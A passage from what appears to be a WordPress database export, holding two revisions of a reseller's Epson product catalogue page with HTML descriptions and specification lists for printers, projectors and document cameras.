productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" />\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></h4>\nSave more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.\n<ul>\n 	<li>Compact integrated tank design</li>\n 	<li>High yield ink bottles</li>\n 	<li>Spill-free, error-free refilling</li>\n 	<li>Wi-Fi, Wi-Fi Direct</li>\n 	<li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li>\n 	<li>Borderless printing up to 4R</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></h4><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h3>LASER PRINTER</h3>		\n		<p><strong>Epson AcuLaser C9300N</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<p>Â <strong>Epson WorkForce AL-M320DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson WorkForce AL-M8100DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 16:57:31','2019-09-25 08:57:31','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3453,1,'2019-09-25 17:00:13','2019-09-25 09:00:13','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h3>LASER PRINTER</h3>		\n		<p><strong>Epson AcuLaser C9300N</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<p>Â <strong>Epson WorkForce AL-M320DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson WorkForce AL-M8100DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in 